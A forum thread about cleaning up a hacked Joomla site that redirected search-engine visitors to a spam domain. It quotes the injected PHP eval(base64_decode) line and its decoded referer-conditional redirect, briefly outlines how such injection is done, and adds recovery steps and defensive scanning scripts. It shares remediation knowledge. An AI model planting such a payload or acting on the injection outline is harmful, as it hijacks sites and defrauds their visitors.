Search engine to SPAM redirect error

I wasted my whole weekend over it :smack: . . . but I have finally been able to fix it.

So let me tell you what was happening. I am maintaining a website, and if you search for that website in Google it comes up at the top. But the issue was that when you clicked on the link, instead of going to the original site it redirected to some spam site. But if you entered the direct URL in the browser it worked fine. Via Firebug I was able to detect that it was redirecting, but I couldn’t figure out what was causing it.

Anyways , after wasting too much time I noticed a single line on top of every page which I thought wasn’t there before

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsN
CmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVS
WydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIo="));

This freaken damn line . Ok now let me show you its decoded form


// Decoded payload, shown for analysis only
error_reporting(0);  // suppress errors so the site owner sees nothing odd
$nccv=headers_sent();
if (!$nccv){  // a redirect header can only be sent before any output
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];  // read here, not used in the part shown
// Act only when the visitor arrived from a search engine
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")
 or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or 
stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){        
        header("Location: http://www.fdvrerefrr.ezua.com/");
        exit();
    }
}
}

See how these damn hackers write intelligent scripts to add this line in your code . :grumpy:

Anyways, I just removed the first line from all the files and now it's working fine. I also fixed the write permission of all the files and now I am planning to upgrade the version of the site to patch these security holes.

I hope it will help someone in the same situation as I was:)
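
The symptom described in this post (direct visits work, clicks from a search result get redirected) can be checked from the outside by requesting the page with and without a search-engine Referer and comparing the answers. This is an added example, not part of the original post; the referer URLs, `site.example`, `spam.example` and the simulated site function are assumptions made up for the demonstration.

```python
import http.client
from urllib.parse import urlsplit

# Constructed Referer values for three of the engines named in the decoded code.
SEARCH_REFERERS = {
    "google": "https://www.google.com/search?q=example",
    "bing": "https://www.bing.com/search?q=example",
    "yahoo": "https://search.yahoo.com/search?p=example",
}
REDIRECTS = (301, 302, 303, 307, 308)

def http_fetch(url, headers):
    """One GET that does not follow redirects; returns (status, Location)."""
    u = urlsplit(url)
    cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = cls(u.netloc, timeout=10)
    try:
        path = (u.path or "/") + ("?" + u.query if u.query else "")
        conn.request("GET", path, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()

def find_conditional_redirects(url, fetch=http_fetch):
    """Compare a direct visit with visits that carry a search-engine Referer."""
    baseline = fetch(url, {})
    suspicious = {}
    for name, referer in SEARCH_REFERERS.items():
        status, location = fetch(url, {"Referer": referer})
        if status in REDIRECTS and (status, location) != baseline:
            suspicious[name] = location  # redirected only for search visitors
    return baseline, suspicious

def simulated_infected_site(url, headers):
    """Constructed stand-in for a page carrying the injected check (no network)."""
    referer = headers.get("Referer", "").lower()
    if any(s in referer for s in ("yahoo", "google", "bing")):
        return 302, "http://spam.example/"
    return 200, None

if __name__ == "__main__":
    print(find_conditional_redirects("http://site.example/", simulated_infected_site))
```

Against a real site, call `find_conditional_redirects(url)` with the default `http_fetch`; any entry in the second return value means the page answers search-engine visitors differently from direct ones.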

Re: Search engine to SPAM redirect error

thanks for sharing .
Here is some more information I found for someone.

OK , so here is the long answer:
What do you do when your Google listings turn into Viagra spam? It’s a Webmaster’s or IT Manager’s worst nightmare come true.
You wake up to your phone ringing off the hook. Your client or company yelling at you to “Get the Viagra ads off the website!”

Overnight your site got hacked. The description in your Google listings now say you are selling “Viagra from a Licensed Canadian Pharmacist”.
This hack only affects your search engine listings – not the website. Anyone looking at your Google listings can see you’ve obviously been hacked and don’t want to click on a Viagra ad – paralyzing Internet communication.
“Google Conditional Hack” is the latest hack hitting websites hard.

What makes this hack unusually insidious is that although everyone can see the Viagra spam in the site’s Google listings – everyone can see it except the Webmaster or IT Department whose job it is to fix it because this hack simply cannot be seen by humans without special tools and humans can’t fix what they can’t see!

The word “Viagra” may not even appear anywhere in the source code of the hacked site humans can see. The hacked coding can only be seen through the eyes of the GoogleBot, Google’s robot spider that crawls your site to rank and index it.
The only place you can see the result of the hack through the GoogleBot’s eyes is in Google Webmaster Tools. Establishing an account is a relatively simple procedure taking less than five minutes by copying and pasting code Google supplies onto your website. Google: Google Webmaster Tools

Go to the bottom of the main menu and click “Labs” then select “Fetch as Googlebot” – a recent addition to Google’s website to help webmasters combat this problem. This is the only place you can see through the GoogleBot’s eyes to make the hacked code visible for humans to remove it.
[size=2]But unless the Webmaster or IT Manager knows this trick… Good Luck!
They can look forever for the hacked Viagra spam coding and will never ever find it – the whole time everyone yelling at them to “Get the Viagra ads off the site!”
Five steps you must take when your Google listings turn into Viagra spam with a Google Conditional Hack

Speed of recovery is key as the loss of anyone’s website is an emergency. Knowing the steps to recover from this hack and the time involved to execute each step is crucial to keep your website’s downtime to a minimum.
When this hack recently hit the website of the city government in the hills above Google’s Silicon Valley headquarters where many top Google executives live it paralyzed city government Internet communications for two weeks when the city’s Google listings turned into Viagra ads people don’t click on.
Google has added new features to Google’s Webmaster Tools to help Webmasters combat this problem that’s rising sharply. These include the “Fetch as GoogleBot” tool, the URL removal tool which is now reversible so you can remove and reinstate a URL that has been corrupted, and the “Cache Removal” tool for the homepage which is the most common page to be hacked.
Nathan Johns, Search Quality Analyst at Google says hacks are no fun. “Hacks vary in all shapes and sizes. Sometimes they cloak to Googlebot, sometimes they don’t.” But they all follow a basic theme. “Your site gets hacked, the hacker cloaks content to a search engine (in this case Google) and shows different content to the user, generally making money through affiliate ads or clicks. Many parts of this formula can be executed differently, but that’s the general idea.”
Unfortunately, it’s a sad fact of life most websites don’t discover their true vulnerability until after they’ve actually already been hacked. Then it’s a matter of fast recovery.
Be prepared to explain to nontechnical people “Well if this is a ‘Google Conditional Hack’ that only affects Google listings, is Google going to fix it?” No, the hack is on the site – not Google. It’s that only the GoogleBot can see the hacked Viagra spam coding.

Google provides invaluable tools and advice to help recover at Google Webmaster Tools and in the Google Webmaster Help Forums where you can get answers to tough questions within a couple hours. Google: Google Webmaster Help Forums

1. Quarantine Your Site and Secure the Host
This is the single most important and responsible first thing to do so no one else gets hurt. If hackers could change your site, they could also be changing information on your site – or worse, installing malware on your visitors.
Google’s John Mueller says, “The easiest way to do this – while still allowing you to diagnose this issue – is to just point your DNS entry to a different server (which could show an “under maintenance” banner, for instance). If you need to provide some information, you could put a collection of FAQs on that banner page.” Keep them simple HTML pages.
Contact your web hoster. If hackers hit your site, they could potentially hit others on the host. Change the passwords for all users and all accounts. Make sure the computer you do this on is hack free and not capturing new passwords.
Don’t be confused if Google Webmaster Tools reports “No Malware Detected” with this hack. Unless actual trojan horses or spyware are detected being downloaded, this hack will not normally trigger “Malware Detected” displayed under “Diagnostics” in Google Webmaster Tools.

2. Remove the Hacked Pages from Google’s Index
Under “Crawler Access” in Google Webmaster Tools, select “Remove URL.”
Before doing anything be sure to read the link on this page that reads “Removal Requirements.”
You will need to first make sure the page is no longer live on the web, returning either a 404 not found, or 401 status. You must also keep spiders off the page with either a robots.txt file or **** noindex.tag – coding Google will generate and provide you with the links on this same “Crawler Access” page.
It’s very important to know this tool is now reversible, so when the site is cleaned up you can return the URL to Google’s index. As this is a relatively new feature in Google Webmaster Tools untested by most Webmasters – which formerly wouldn’t return the URL within three months – know you can click this with confidence and later bring the URL back within 24-36 hours.
John Mueller of Google assures, “I just wanted to confirm that using the URL removal tool generally does not have lasting, negative effects when you cancel a removal. It may take a day or so for things to come back, but apart from that it would be fine.”
After the site is no longer live and spiders can’t crawl it, click “New URL Removal Request” and complete the request on the “Crawler Access” page. This will get the hacked Viagra ad out of the public’s eye within 12-24 hours. Understand it will then take another 24-36 hours to get the cleaned URL back up on Google once this removal request is reversed.

3. Assess the Damage
One version of this hack that makes it extremely time consuming to assess the scope of the damage is that you only have the small keyhole of the “Fetch as GoogleBot” tool to even be able to see the hacked coding. Then scripts appear to be activated upon viewing which cause it to morph onto other pages causing them to appear hacked at one time – then OK – then hacked with Viagra spam again.
“The hack is flighty, slippery, hard to pin down!” Says Google Webmaster Help Forum Webado after studying it closely. Read the postings and establish a dialog with Google there to help make sense out of an incredibly sophisticated hack that’s even hitting cyber security sites hard.

4. Clean up the Hack
Review your content, remove any suspicious code or pages that were added. Backups of your content are invaluable at this point in terms of speed of recovery. “Consider deleting your content entirely and replacing it with your last known good backup (once you’ve checked to make sure it’s clean and free of hacked content)” Google says.
Use the “Fetch as GoogleBot” tool to be certain the site is now clean.

5. Reverse the URL Removal Request
Go back to the “Remove URL” tab of Google Webmaster Tools and reverse the removal request to reinstate the listing in Google’s Index – which will normally take 24-36 hours.

Probably these Viagra spammers end up in one of those Buddhist Hell Realms where everyone’s genitals are too big or too small and they remain eternally unsatisfied. Meanwhile, the rest of us who have to deal with the consequences of their immaturity need to know how to recover quickly when a Google Conditional Hack turns your Google listings into Viagra spam no one clicks on – paralyzing Internet communication.

To read the entire thread of the Google Webmaster Help Forum on this incident of Google listings turning into Viagra spam:
Need Assistance with a Government Site - Google Webmaster Central Help

And one more:

Welcome to the Malware and Hacked Sites section of the Google Webmaster Help Forum.

Here you can find answers and ask questions about pages or websites …

  • that appear to contain malicious content
  • that have been labeled as containing malicious content
  • that appear to have been hacked

Before you post your question about malware or hacking, please:

If you do post a topic/question, please be patient and wait at least a few hours for a reply (sometimes we do get a little busy here). Also make sure that you include all relevant information, such as the URL or URLs involved.

Keep in mind that posts in this forum are crawled, indexed and will be shown in search results. If you do not want your topic appearing in search results when people search for your website or business name, please use a URL shortening service such as cli.gs | shorturl service to mask your website’s URL.

If you have a question about Crawling, Indexing and Ranking, Webmaster Tools, verification in Webmaster Tools, or Sitemaps, please go to the appropriate section in this forum (see the sidebar for more details). For question regarding Google Maps, Chrome, Gmail or other Google products and services, please see the following list of specialized forums: Google Help Forums - Google Help

Any site-specific questions or off-topic posts will be deleted from this thread; please start a separate thread if you have specific questions.

P.S. – You may be more likely to receive attention from expert forum members and Googlers if you sincerely note the secret phrase: “I have studied the Help Center, read the FAQs and searched for similar questions.”[/size]

Re: Search engine to SPAM redirect error

One of my colleagues was telling me that it's a WYSIWYG exploit. So it won't be a bad idea to update the WYSIWYG editor too.

I heard GS has also been hit by this virus . I wonder what they are doing about it !!

Re: Search engine to SPAM redirect error

NaMaan: how come files on server were appended by malicious script? can anyone check update history on server?

Re: Search engine to SPAM redirect error

If you are using a CMS like Drupal, Joomla or WordPress, always double check the integrity of the package before installing plugins and extensions. If I were you I would also check the permissions on the template files/folder.

Re: Search engine to SPAM redirect error

It's very simple. You can write a simple script in which you can define a couple of string comparisons, browse through the files, and keep on adding a PHP code on top of every file. Similarly, on every 'POST' you can append the same string at the end of the query string and let it submit. Once the site tries to show that text on PostBack or whenever, that PHP script will run and do its thing.

There can be many ways to achieve this kinda hack .

Re: Search engine to SPAM redirect error

I know, buddy. Lesson well learned :D

Re: Search engine to SPAM redirect error

Only the finest riders fall on the battlefield.

In 2005 I was hired at a government dept. for one reason: their website was being hacked every other hour. They restored the database, it got hacked again .. and so it continued.
The site was based on ASP/MSSQL… the problem was with the login area: the so-called hackers' automated system was able to access the database with script exploit techniques. Some idiot designed the login/registration area without any validation against the query string and was using SQL string concatenation queries.

I spent two weeks on that crap; in the end it was two lines of code to fix the problem :smack:

Re: Search engine to SPAM redirect error

SQL injection is the easiest way to hack a website. Therefore, I always support the idea of stored procedures instead of inline SQL in the data layer.

Re: Search engine to SPAM redirect error

^ The first lecture the teacher gave me in Advance ASP class.
It’s been a few years that I haven’t touched coding, but it was time well spent.



Re: Search engine to SPAM redirect error

I wish I could say that I like stored procedures, but I HATE them. My only reasoning is that they are not flexible and might not be as efficient when you have huge data sets.

I am getting more inclined towards Data Access Objects i.e. JPA , Hibernate , Entity framework , ORM etc etc . The best thing about them is that you don't have to write SQL . You don't have to worry about opening/closing connections and all the labor work . They just persist data for you and you can control all the objects from inside your code .

Re: Search engine to SPAM redirect error

what CMS are you using Namaan ?

Re: Search engine to SPAM redirect error

BAD NEWS : ITS BACK :smack:

I think I’ll have to update Joomla version , there is no way out at least for now .

Re: Search engine to SPAM redirect error

It's Joomla.

Re: Search engine to SPAM redirect error

I noticed the same thing when I searched for GS in Google, it's happening even now. I search "Gupshup" in Google, the site paklinks.com is displayed with a spam title and when you click on it you are taken to an online pharmacy.

Re: Search engine to SPAM redirect error

tsk tsk, go on and visit more dirty sites

Re: Search engine to SPAM redirect error

So update is that I fixed the issue again , and this time , I made the infected files READ ONLY . Now if it will come back again , then it means something reallyyyyy fishy about it .

fingers crossed

Re: Search engine to SPAM redirect error

Hello! I am having the same problem you had. I tried to find the “codes” to be removed. But, I could not figure out which files I should look at. It has been a while since you posted, but I would really appreciate it if you could tell me the file names to check.

Thank you.

Re: Search engine to SPAM redirect error

You should look for recently modified files . For me it was index.php and includes/defines.php. I'll suggest not to delete the line, but just comment out the code .
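
For anyone asking which files to check: the injected line from the first post and the "recently modified files" advice above can be combined into one scan. The script below is an added example, not something posted in this thread; it finds `eval(base64_decode("..."))` in `.php` files, decodes the blob as text without running it, and lists hits newest first. The sample payload, `spam.example` and the indicator list are constructed for the demonstration.

```python
import base64
import re
from pathlib import Path

# eval(base64_decode("...")) with either quote style; the blob may be line-wrapped.
INJECT_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""")
# Strings that mark a decoded payload as a referer-conditional redirect.
INDICATORS = ("error_reporting(0)", "HTTP_REFERER", "header(", "Location:")

def decode_payload(blob):
    """Decode the blob to text for reading; it is never executed."""
    compact = "".join(blob.split()).rstrip("=")
    if len(compact) % 4 == 1:      # truncated paste: drop the dangling character
        compact = compact[:-1]
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact).decode("latin-1")

def scan_source(text):
    """Return one finding per injected eval(base64_decode(...)) in a file's text."""
    findings = []
    for m in INJECT_RE.finditer(text):
        decoded = decode_payload(m.group(2))
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "indicators": [s for s in INDICATORS if s in decoded],
        })
    return findings

def scan_tree(root):
    """Scan every .php file under root; infected files, most recently modified first."""
    hits = []
    for path in Path(root).rglob("*.php"):
        found = scan_source(path.read_text(encoding="latin-1"))
        if found:
            hits.append((path, path.stat().st_mtime, found))
    return sorted(hits, key=lambda h: h[1], reverse=True)

# Constructed sample input: a stand-in payload injected on line 1 of a page.
_PAYLOAD = (b'error_reporting(0);\n'
            b'if (stristr($_SERVER["HTTP_REFERER"],"google")) {\n'
            b'  header("Location: http://spam.example/"); exit(); }')
SAMPLE_INFECTED = ('<?php eval(base64_decode("%s")); ?>\n<?php echo "real page";\n'
                   % base64.b64encode(_PAYLOAD).decode())
SAMPLE_CLEAN = '<?php echo base64_decode($row["avatar"]);\n'
```

Run `scan_tree("/path/to/webroot")` on a copy of the site; a file that uses `base64_decode` for ordinary data, like `SAMPLE_CLEAN`, is not reported.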

Re: Search engine to SPAM redirect error

Thank you for your message, NaMaan. I solved the problem by telling your advice to the company I am using for my blog. It was a "wp-config.php" file for my case. Big relief!

Thank you very much.

Ken